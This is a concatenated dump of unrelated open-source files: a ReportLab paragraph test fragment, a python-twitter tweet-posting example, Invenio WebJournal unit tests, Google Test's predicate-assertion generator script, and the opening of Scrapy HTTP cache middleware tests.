kennt eine einzige Methode, <font name=Courier>s.tolist()</font><onDraw name=myIndex label="XRangeType::tolist() (Methode)"><onDraw name=myIndex label="s.tolist() (Methode)"><onDraw name=myIndex label="Methoden::s.tolist()">, die seine Werte in eine Liste umwandelt.'''
aW = 420
aH = 64.4
P=Paragraph(text, B)
dumpParagraphFrags(P)
w,h = P.wrap(aW,aH)
print 'After initial wrap',w,h
dumpParagraphLines(P)
S = P.split(aW,aH)
dumpParagraphFrags(S[0])
w0,h0 = S[0].wrap(aW,aH)
print 'After split wrap',w0,h0
dumpParagraphLines(S[0])
if flagged(5):
text = '<para> %s <![CDATA[</font></b>& %s < >]]></para>' % (chr(163),chr(163))
P=Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
if flagged(6):
for text in ['''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''',
'''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''',
'''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''',
]:
P=Paragraph(text, styleSheet['Normal'], caseSensitive=0)
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
if flagged(7):
text = """<para align="CENTER" fontSize="24" leading="30"><b>Generated by:</b>Dilbert</para>"""
P=Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
if flagged(8):
text ="""- bullet 0<br/>- bullet 1<br/>- bullet 2<br/>- bullet 3<br/>- bullet 4<br/>- bullet 5"""
P=Paragraph(text, styleSheet['Normal'])
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
S = P.split(6*72,h/2.0)
print len(S)
dumpParagraphLines(S[0])
dumpParagraphLines(S[1])
if flagged(9):
text="""Furthermore, the fundamental error of
regarding <img src="../docs/images/testimg.gif" width="3" height="7"/> functional notions as
categorial delimits a general
convention regarding the forms of the<br/>
grammar. I suggested that these results
would follow from the assumption that"""
P=Paragraph(text,ParagraphStyle('aaa',parent=styleSheet['Normal'],align=TA_JUSTIFY))
dumpParagraphFrags(P)
w,h = P.wrap(6*cm-12, 9.7*72)
dumpParagraphLines(P)
if flagged(10):
text="""a b c\xc2\xa0d e f"""
P=Paragraph(text,ParagraphStyle('aaa',parent=styleSheet['Normal'],align=TA_JUSTIFY))
dumpParagraphFrags(P)
w,h = P.wrap(6*cm-12, 9.7*72)
dumpParagraphLines(P)
| apache-2.0 |
mrmendee/Twitter-get-word | examples/tweet.py | 28 | 4205 | #!/usr/bin/python2.4
'''Post a message to twitter'''
__author__ = 'dewitt@google.com'
import ConfigParser
import getopt
import os
import sys
import twitter
USAGE = '''Usage: tweet [options] message
This script posts a message to Twitter.
Options:
-h --help : print this help
--consumer-key : the twitter consumer key
--consumer-secret : the twitter consumer secret
--access-key : the twitter access token key
--access-secret : the twitter access token secret
--encoding : the character set encoding used in input strings, e.g. "utf-8". [optional]
Documentation:
If either of the command line flags are not present, the environment
variables TWEETUSERNAME and TWEETPASSWORD will then be checked for your
consumer_key or consumer_secret, respectively.
If neither the command line flags nor the enviroment variables are
present, the .tweetrc file, if it exists, can be used to set the
default consumer_key and consumer_secret. The file should contain the
following three lines, replacing *consumer_key* with your consumer key, and
*consumer_secret* with your consumer secret:
A skeletal .tweetrc file:
[Tweet]
consumer_key: *consumer_key*
consumer_secret: *consumer_password*
access_key: *access_key*
access_secret: *access_password*
'''
def PrintUsageAndExit():
print USAGE
sys.exit(2)
def GetConsumerKeyEnv():
return os.environ.get("TWEETUSERNAME", None)
def GetConsumerSecretEnv():
return os.environ.get("TWEETPASSWORD", None)
def GetAccessKeyEnv():
return os.environ.get("TWEETACCESSKEY", None)
def GetAccessSecretEnv():
return os.environ.get("TWEETACCESSSECRET", None)
class TweetRc(object):
def __init__(self):
self._config = None
def GetConsumerKey(self):
return self._GetOption('consumer_key')
def GetConsumerSecret(self):
return self._GetOption('consumer_secret')
def GetAccessKey(self):
return self._GetOption('access_key')
def GetAccessSecret(self):
return self._GetOption('access_secret')
def _GetOption(self, option):
try:
return self._GetConfig().get('Tweet', option)
except:
return None
def _GetConfig(self):
if not self._config:
self._config = ConfigParser.ConfigParser()
self._config.read(os.path.expanduser('~/.tweetrc'))
return self._config
def main():
try:
shortflags = 'h'
longflags = ['help', 'consumer-key=', 'consumer-secret=',
'access-key=', 'access-secret=', 'encoding=']
opts, args = getopt.gnu_getopt(sys.argv[1:], shortflags, longflags)
except getopt.GetoptError:
PrintUsageAndExit()
consumer_keyflag = None
consumer_secretflag = None
access_keyflag = None
access_secretflag = None
encoding = None
for o, a in opts:
if o in ("-h", "--help"):
PrintUsageAndExit()
if o in ("--consumer-key"):
consumer_keyflag = a
if o in ("--consumer-secret"):
consumer_secretflag = a
if o in ("--access-key"):
access_keyflag = a
if o in ("--access-secret"):
access_secretflag = a
if o in ("--encoding"):
encoding = a
message = ' '.join(args)
if not message:
PrintUsageAndExit()
rc = TweetRc()
consumer_key = consumer_keyflag or GetConsumerKeyEnv() or rc.GetConsumerKey()
consumer_secret = consumer_secretflag or GetConsumerSecretEnv() or rc.GetConsumerSecret()
access_key = access_keyflag or GetAccessKeyEnv() or rc.GetAccessKey()
access_secret = access_secretflag or GetAccessSecretEnv() or rc.GetAccessSecret()
if not consumer_key or not consumer_secret or not access_key or not access_secret:
PrintUsageAndExit()
api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,
access_token_key=access_key, access_token_secret=access_secret,
input_encoding=encoding)
try:
status = api.PostUpdate(message)
except UnicodeDecodeError:
print "Your message could not be encoded. Perhaps it contains non-ASCII characters? "
print "Try explicitly specifying the encoding with the --encoding flag"
sys.exit(2)
print "%s just posted: %s" % (status.user.name, status.text)
if __name__ == "__main__":
main()
| apache-2.0 |
AlbertoPeon/invenio | modules/webjournal/lib/webjournal_unit_tests.py | 16 | 2773 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for WebJournal."""
__revision__ = \
"$Id$"
# pylint invenio/modules/webjournal/lib/webjournal_tests.py
import unittest
from invenio.webjournal_utils import compare_issues
from invenio.webjournal import issue_is_later_than
#from invenio import webjournal_utils
from invenio.testutils import make_test_suite, run_test_suite
#from invenio.config import CFG_SITE_URL
class TestCompareIssues(unittest.TestCase):
"""Tests for comparing issues."""
def test_compare_issues(self):
"""webjournal - tests comparing issues"""
issue1 = '06/2009'
issue2 = '07/2009'
self.assertEqual(compare_issues(issue1, issue2), -1)
issue1 = '07/2009'
issue2 = '06/2009'
self.assertEqual(compare_issues(issue1, issue2), 1)
issue1 = '07/2009'
issue2 = '07/2009'
self.assertEqual(compare_issues(issue1, issue2), 0)
issue1 = '07/2009'
issue2 = '07/2008'
self.assertEqual(compare_issues(issue1, issue2), 1)
issue1 = '07/2008'
issue2 = '07/2009'
self.assertEqual(compare_issues(issue1, issue2), -1)
def test_issue1_is_later_than(self):
"""webjournal - tests comparing issue1 is later than issue2 """
issue1 = '07/2009'
issue2 = '07/2008'
self.assertEqual(issue_is_later_than(issue1, issue2), True)
issue1 = '07/2008'
issue2 = '07/2009'
self.assertEqual(issue_is_later_than(issue1, issue2), False)
issue1 = '07/2009'
issue2 = '06/2009'
self.assertEqual(issue_is_later_than(issue1, issue2), True)
issue1 = '06/2009'
issue2 = '07/2009'
self.assertEqual(issue_is_later_than(issue1, issue2), False)
issue1 = '07/2009'
issue2 = '07/2009'
self.assertEqual(issue_is_later_than(issue1, issue2), False)
TEST_SUITE = make_test_suite(TestCompareIssues)
if __name__ == "__main__":
run_test_suite(TEST_SUITE)
| gpl-2.0 |
AgileInstitute/SetDemo-GTest | SetDemo/gtest-1.7.0/scripts/gen_gtest_pred_impl.py | 2538 | 21986 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""gen_gtest_pred_impl.py v0.1
Generates the implementation of Google Test predicate assertions and
accompanying tests.
Usage:
gen_gtest_pred_impl.py MAX_ARITY
where MAX_ARITY is a positive integer.
The command generates the implementation of up-to MAX_ARITY-ary
predicate assertions, and writes it to file gtest_pred_impl.h in the
directory where the script is. It also generates the accompanying
unit test in file gtest_pred_impl_unittest.cc.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import sys
import time
# Where this script is.
SCRIPT_DIR = os.path.dirname(sys.argv[0])
# Where to store the generated header.
HEADER = os.path.join(SCRIPT_DIR, '../include/gtest/gtest_pred_impl.h')
# Where to store the generated unit test.
UNIT_TEST = os.path.join(SCRIPT_DIR, '../test/gtest_pred_impl_unittest.cc')
def HeaderPreamble(n):
"""Returns the preamble for the header file.
Args:
n: the maximum arity of the predicate macros to be generated.
"""
# A map that defines the values used in the preamble template.
DEFS = {
'today' : time.strftime('%m/%d/%Y'),
'year' : time.strftime('%Y'),
'command' : '%s %s' % (os.path.basename(sys.argv[0]), n),
'n' : n
}
return (
"""// Copyright 2006, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is AUTOMATICALLY GENERATED on %(today)s by command
// '%(command)s'. DO NOT EDIT BY HAND!
//
// Implements a family of generic predicate assertion macros.
#ifndef GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
#define GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
// Makes sure this header is not included before gtest.h.
#ifndef GTEST_INCLUDE_GTEST_GTEST_H_
# error Do not include gtest_pred_impl.h directly. Include gtest.h instead.
#endif // GTEST_INCLUDE_GTEST_GTEST_H_
// This header implements a family of generic predicate assertion
// macros:
//
// ASSERT_PRED_FORMAT1(pred_format, v1)
// ASSERT_PRED_FORMAT2(pred_format, v1, v2)
// ...
//
// where pred_format is a function or functor that takes n (in the
// case of ASSERT_PRED_FORMATn) values and their source expression
// text, and returns a testing::AssertionResult. See the definition
// of ASSERT_EQ in gtest.h for an example.
//
// If you don't care about formatting, you can use the more
// restrictive version:
//
// ASSERT_PRED1(pred, v1)
// ASSERT_PRED2(pred, v1, v2)
// ...
//
// where pred is an n-ary function or functor that returns bool,
// and the values v1, v2, ..., must support the << operator for
// streaming to std::ostream.
//
// We also define the EXPECT_* variations.
//
// For now we only support predicates whose arity is at most %(n)s.
// Please email googletestframework@googlegroups.com if you need
// support for higher arities.
// GTEST_ASSERT_ is the basic statement to which all of the assertions
// in this file reduce. Don't use this in your code.
#define GTEST_ASSERT_(expression, on_failure) \\
GTEST_AMBIGUOUS_ELSE_BLOCKER_ \\
if (const ::testing::AssertionResult gtest_ar = (expression)) \\
; \\
else \\
on_failure(gtest_ar.failure_message())
""" % DEFS)
def Arity(n):
"""Returns the English name of the given arity."""
if n < 0:
return None
elif n <= 3:
return ['nullary', 'unary', 'binary', 'ternary'][n]
else:
return '%s-ary' % n
def Title(word):
"""Returns the given word in title case. The difference between
this and string's title() method is that Title('4-ary') is '4-ary'
while '4-ary'.title() is '4-Ary'."""
return word[0].upper() + word[1:]
def OneTo(n):
"""Returns the list [1, 2, 3, ..., n]."""
return range(1, n + 1)
def Iter(n, format, sep=''):
"""Given a positive integer n, a format string that contains 0 or
more '%s' format specs, and optionally a separator string, returns
the join of n strings, each formatted with the format string on an
iterator ranged from 1 to n.
Example:
Iter(3, 'v%s', sep=', ') returns 'v1, v2, v3'.
"""
# How many '%s' specs are in format?
spec_count = len(format.split('%s')) - 1
return sep.join([format % (spec_count * (i,)) for i in OneTo(n)])
def ImplementationForArity(n):
"""Returns the implementation of n-ary predicate assertions."""
# A map the defines the values used in the implementation template.
DEFS = {
'n' : str(n),
'vs' : Iter(n, 'v%s', sep=', '),
'vts' : Iter(n, '#v%s', sep=', '),
'arity' : Arity(n),
'Arity' : Title(Arity(n))
}
impl = """
// Helper function for implementing {EXPECT|ASSERT}_PRED%(n)s. Don't use
// this in your code.
template <typename Pred""" % DEFS
impl += Iter(n, """,
typename T%s""")
impl += """>
AssertionResult AssertPred%(n)sHelper(const char* pred_text""" % DEFS
impl += Iter(n, """,
const char* e%s""")
impl += """,
Pred pred"""
impl += Iter(n, """,
const T%s& v%s""")
impl += """) {
if (pred(%(vs)s)) return AssertionSuccess();
""" % DEFS
impl += ' return AssertionFailure() << pred_text << "("'
impl += Iter(n, """
<< e%s""", sep=' << ", "')
impl += ' << ") evaluates to false, where"'
impl += Iter(n, """
<< "\\n" << e%s << " evaluates to " << v%s""")
impl += """;
}
// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT%(n)s.
// Don't use this in your code.
#define GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, on_failure)\\
GTEST_ASSERT_(pred_format(%(vts)s, %(vs)s), \\
on_failure)
// Internal macro for implementing {EXPECT|ASSERT}_PRED%(n)s. Don't use
// this in your code.
#define GTEST_PRED%(n)s_(pred, %(vs)s, on_failure)\\
GTEST_ASSERT_(::testing::AssertPred%(n)sHelper(#pred""" % DEFS
impl += Iter(n, """, \\
#v%s""")
impl += """, \\
pred"""
impl += Iter(n, """, \\
v%s""")
impl += """), on_failure)
// %(Arity)s predicate assertion macros.
#define EXPECT_PRED_FORMAT%(n)s(pred_format, %(vs)s) \\
GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, GTEST_NONFATAL_FAILURE_)
#define EXPECT_PRED%(n)s(pred, %(vs)s) \\
GTEST_PRED%(n)s_(pred, %(vs)s, GTEST_NONFATAL_FAILURE_)
#define ASSERT_PRED_FORMAT%(n)s(pred_format, %(vs)s) \\
GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, GTEST_FATAL_FAILURE_)
#define ASSERT_PRED%(n)s(pred, %(vs)s) \\
GTEST_PRED%(n)s_(pred, %(vs)s, GTEST_FATAL_FAILURE_)
""" % DEFS
return impl
def HeaderPostamble():
"""Returns the postamble for the header file."""
return """
#endif // GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
"""
def GenerateFile(path, content):
"""Given a file path and a content string, overwrites it with the
given content."""
print 'Updating file %s . . .' % path
f = file(path, 'w+')
print >>f, content,
f.close()
print 'File %s has been updated.' % path
def GenerateHeader(n):
"""Given the maximum arity n, updates the header file that implements
the predicate assertions."""
GenerateFile(HEADER,
HeaderPreamble(n)
+ ''.join([ImplementationForArity(i) for i in OneTo(n)])
+ HeaderPostamble())
def UnitTestPreamble():
"""Returns the preamble for the unit test file."""
# A map that defines the values used in the preamble template.
DEFS = {
'today' : time.strftime('%m/%d/%Y'),
'year' : time.strftime('%Y'),
'command' : '%s %s' % (os.path.basename(sys.argv[0]), sys.argv[1]),
}
return (
"""// Copyright 2006, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is AUTOMATICALLY GENERATED on %(today)s by command
// '%(command)s'. DO NOT EDIT BY HAND!
// Regression test for gtest_pred_impl.h
//
// This file is generated by a script and quite long. If you intend to
// learn how Google Test works by reading its unit tests, read
// gtest_unittest.cc instead.
//
// This is intended as a regression test for the Google Test predicate
// assertions. We compile it as part of the gtest_unittest target
// only to keep the implementation tidy and compact, as it is quite
// involved to set up the stage for testing Google Test using Google
// Test itself.
//
// Currently, gtest_unittest takes ~11 seconds to run in the testing
// daemon. In the future, if it grows too large and needs much more
// time to finish, we should consider separating this file into a
// stand-alone regression test.
#include <iostream>
#include "gtest/gtest.h"
#include "gtest/gtest-spi.h"
// A user-defined data type.
struct Bool {
explicit Bool(int val) : value(val != 0) {}
bool operator>(int n) const { return value > Bool(n).value; }
Bool operator+(const Bool& rhs) const { return Bool(value + rhs.value); }
bool operator==(const Bool& rhs) const { return value == rhs.value; }
bool value;
};
// Enables Bool to be used in assertions.
std::ostream& operator<<(std::ostream& os, const Bool& x) {
return os << (x.value ? "true" : "false");
}
""" % DEFS)
def TestsForArity(n):
"""Returns the tests for n-ary predicate assertions."""
# A map that defines the values used in the template for the tests.
DEFS = {
'n' : n,
'es' : Iter(n, 'e%s', sep=', '),
'vs' : Iter(n, 'v%s', sep=', '),
'vts' : Iter(n, '#v%s', sep=', '),
'tvs' : Iter(n, 'T%s v%s', sep=', '),
'int_vs' : Iter(n, 'int v%s', sep=', '),
'Bool_vs' : Iter(n, 'Bool v%s', sep=', '),
'types' : Iter(n, 'typename T%s', sep=', '),
'v_sum' : Iter(n, 'v%s', sep=' + '),
'arity' : Arity(n),
'Arity' : Title(Arity(n)),
}
tests = (
"""// Sample functions/functors for testing %(arity)s predicate assertions.
// A %(arity)s predicate function.
template <%(types)s>
bool PredFunction%(n)s(%(tvs)s) {
return %(v_sum)s > 0;
}
// The following two functions are needed to circumvent a bug in
// gcc 2.95.3, which sometimes has problem with the above template
// function.
bool PredFunction%(n)sInt(%(int_vs)s) {
return %(v_sum)s > 0;
}
bool PredFunction%(n)sBool(%(Bool_vs)s) {
return %(v_sum)s > 0;
}
""" % DEFS)
tests += """
// A %(arity)s predicate functor.
struct PredFunctor%(n)s {
template <%(types)s>
bool operator()(""" % DEFS
tests += Iter(n, 'const T%s& v%s', sep=""",
""")
tests += """) {
return %(v_sum)s > 0;
}
};
""" % DEFS
tests += """
// A %(arity)s predicate-formatter function.
template <%(types)s>
testing::AssertionResult PredFormatFunction%(n)s(""" % DEFS
tests += Iter(n, 'const char* e%s', sep=""",
""")
tests += Iter(n, """,
const T%s& v%s""")
tests += """) {
if (PredFunction%(n)s(%(vs)s))
return testing::AssertionSuccess();
return testing::AssertionFailure()
<< """ % DEFS
tests += Iter(n, 'e%s', sep=' << " + " << ')
tests += """
<< " is expected to be positive, but evaluates to "
<< %(v_sum)s << ".";
}
""" % DEFS
tests += """
// A %(arity)s predicate-formatter functor.
struct PredFormatFunctor%(n)s {
template <%(types)s>
testing::AssertionResult operator()(""" % DEFS
tests += Iter(n, 'const char* e%s', sep=""",
""")
tests += Iter(n, """,
const T%s& v%s""")
tests += """) const {
return PredFormatFunction%(n)s(%(es)s, %(vs)s);
}
};
""" % DEFS
tests += """
// Tests for {EXPECT|ASSERT}_PRED_FORMAT%(n)s.
class Predicate%(n)sTest : public testing::Test {
protected:
virtual void SetUp() {
expected_to_finish_ = true;
finished_ = false;""" % DEFS
tests += """
""" + Iter(n, 'n%s_ = ') + """0;
}
"""
tests += """
virtual void TearDown() {
// Verifies that each of the predicate's arguments was evaluated
// exactly once."""
tests += ''.join(["""
EXPECT_EQ(1, n%s_) <<
"The predicate assertion didn't evaluate argument %s "
"exactly once.";""" % (i, i + 1) for i in OneTo(n)])
tests += """
// Verifies that the control flow in the test function is expected.
if (expected_to_finish_ && !finished_) {
FAIL() << "The predicate assertion unexpactedly aborted the test.";
} else if (!expected_to_finish_ && finished_) {
FAIL() << "The failed predicate assertion didn't abort the test "
"as expected.";
}
}
// true iff the test function is expected to run to finish.
static bool expected_to_finish_;
// true iff the test function did run to finish.
static bool finished_;
""" % DEFS
tests += Iter(n, """
static int n%s_;""")
tests += """
};
bool Predicate%(n)sTest::expected_to_finish_;
bool Predicate%(n)sTest::finished_;
""" % DEFS
tests += Iter(n, """int Predicate%%(n)sTest::n%s_;
""") % DEFS
tests += """
typedef Predicate%(n)sTest EXPECT_PRED_FORMAT%(n)sTest;
typedef Predicate%(n)sTest ASSERT_PRED_FORMAT%(n)sTest;
typedef Predicate%(n)sTest EXPECT_PRED%(n)sTest;
typedef Predicate%(n)sTest ASSERT_PRED%(n)sTest;
""" % DEFS
def GenTest(use_format, use_assert, expect_failure,
use_functor, use_user_type):
"""Returns the test for a predicate assertion macro.
Args:
use_format: true iff the assertion is a *_PRED_FORMAT*.
use_assert: true iff the assertion is a ASSERT_*.
expect_failure: true iff the assertion is expected to fail.
use_functor: true iff the first argument of the assertion is
a functor (as opposed to a function)
use_user_type: true iff the predicate functor/function takes
argument(s) of a user-defined type.
Example:
GenTest(1, 0, 0, 1, 0) returns a test that tests the behavior
of a successful EXPECT_PRED_FORMATn() that takes a functor
whose arguments have built-in types."""
if use_assert:
assrt = 'ASSERT' # 'assert' is reserved, so we cannot use
# that identifier here.
else:
assrt = 'EXPECT'
assertion = assrt + '_PRED'
if use_format:
pred_format = 'PredFormat'
assertion += '_FORMAT'
else:
pred_format = 'Pred'
assertion += '%(n)s' % DEFS
if use_functor:
pred_format_type = 'functor'
pred_format += 'Functor%(n)s()'
else:
pred_format_type = 'function'
pred_format += 'Function%(n)s'
if not use_format:
if use_user_type:
pred_format += 'Bool'
else:
pred_format += 'Int'
test_name = pred_format_type.title()
if use_user_type:
arg_type = 'user-defined type (Bool)'
test_name += 'OnUserType'
if expect_failure:
arg = 'Bool(n%s_++)'
else:
arg = 'Bool(++n%s_)'
else:
arg_type = 'built-in type (int)'
test_name += 'OnBuiltInType'
if expect_failure:
arg = 'n%s_++'
else:
arg = '++n%s_'
if expect_failure:
successful_or_failed = 'failed'
expected_or_not = 'expected.'
test_name += 'Failure'
else:
successful_or_failed = 'successful'
expected_or_not = 'UNEXPECTED!'
test_name += 'Success'
# A map that defines the values used in the test template.
defs = DEFS.copy()
defs.update({
'assert' : assrt,
'assertion' : assertion,
'test_name' : test_name,
'pf_type' : pred_format_type,
'pf' : pred_format,
'arg_type' : arg_type,
'arg' : arg,
'successful' : successful_or_failed,
'expected' : expected_or_not,
})
test = """
// Tests a %(successful)s %(assertion)s where the
// predicate-formatter is a %(pf_type)s on a %(arg_type)s.
TEST_F(%(assertion)sTest, %(test_name)s) {""" % defs
indent = (len(assertion) + 3)*' '
extra_indent = ''
if expect_failure:
extra_indent = ' '
if use_assert:
test += """
expected_to_finish_ = false;
EXPECT_FATAL_FAILURE({ // NOLINT"""
else:
test += """
EXPECT_NONFATAL_FAILURE({ // NOLINT"""
test += '\n' + extra_indent + """ %(assertion)s(%(pf)s""" % defs
test = test % defs
test += Iter(n, ',\n' + indent + extra_indent + '%(arg)s' % defs)
test += ');\n' + extra_indent + ' finished_ = true;\n'
if expect_failure:
test += ' }, "");\n'
test += '}\n'
return test
# Generates tests for all 2**6 = 64 combinations.
tests += ''.join([GenTest(use_format, use_assert, expect_failure,
use_functor, use_user_type)
for use_format in [0, 1]
for use_assert in [0, 1]
for expect_failure in [0, 1]
for use_functor in [0, 1]
for use_user_type in [0, 1]
])
return tests
def UnitTestPostamble():
"""Returns the postamble for the tests."""
return ''
def GenerateUnitTest(n):
"""Returns the tests for up-to n-ary predicate assertions."""
GenerateFile(UNIT_TEST,
UnitTestPreamble()
+ ''.join([TestsForArity(i) for i in OneTo(n)])
+ UnitTestPostamble())
def _Main():
"""The entry point of the script. Generates the header file and its
unit test."""
if len(sys.argv) != 2:
print __doc__
print 'Author: ' + __author__
sys.exit(1)
n = int(sys.argv[1])
GenerateHeader(n)
GenerateUnitTest(n)
if __name__ == '__main__':
_Main()
| mit |
dhenyjarasandy/scrapy | tests/test_downloadermiddleware_httpcache.py | 5 | 19286 | from __future__ import print_function
import time
import tempfile
import shutil
import unittest
import email.utils
from contextlib import contextmanager
import pytest
from scrapy.http import Response, HtmlResponse, Request
from scrapy.spider import Spider
from scrapy.settings import Settings
from scrapy.exceptions import IgnoreRequest
from scrapy.utils.test import get_crawler
from scrapy.contrib.downloadermiddleware.httpcache import HttpCacheMiddleware
class _BaseTest(unittest.TestCase):
storage_class = 'scrapy.contrib.httpcache.DbmCacheStorage'
policy_class = 'scrapy.contrib.httpcache.RFC2616Policy'
def setUp(self):
self.yesterday = email.utils.formatdate(time.time() - 86400)
self.today = email.utils.formatdate()
self.tomorrow = email.utils.formatdate(time.time() + 86400)
self.crawler = get_crawler(Spider)
self.spider = self.crawler._create_spider('example.com')
self.tmpdir = tempfile.mkdtemp()
self.request = Request('http://www.example.com',
headers={'User-Agent': 'test'})
self.response = Response('http://www.example.com',
headers={'Content-Type': 'text/html'},
body='test body',
status=202)
self.crawler.stats.open_spider(self.spider)
def tearDown(self):
self.crawler.stats.close_spider(self.spider, '')
shutil.rmtree(self.tmpdir)
def _get_settings(self, **new_settings):
settings = {
'HTTPCACHE_ENABLED': True,
'HTTPCACHE_DIR': self.tmpdir,
'HTTPCACHE_EXPIRATION_SECS': 1,
'HTTPCACHE_IGNORE_HTTP_CODES': [],
'HTTPCACHE_POLICY': self.policy_class,
'HTTPCACHE_STORAGE': self.storage_class,
}
settings.update(new_settings)
return Settings(settings)
@contextmanager
def _storage(self, **new_settings):
with self._middleware(**new_settings) as mw:
yield mw.storage
@contextmanager
def _policy(self, **new_settings):
with self._middleware(**new_settings) as mw:
yield mw.policy
@contextmanager
def _middleware(self, **new_settings):
settings = self._get_settings(**new_settings)
mw = HttpCacheMiddleware(settings, self.crawler.stats)
mw.spider_opened(self.spider)
try:
yield mw
finally:
mw.spider_closed(self.spider)
def assertEqualResponse(self, response1, response2):
self.assertEqual(response1.url, response2.url)
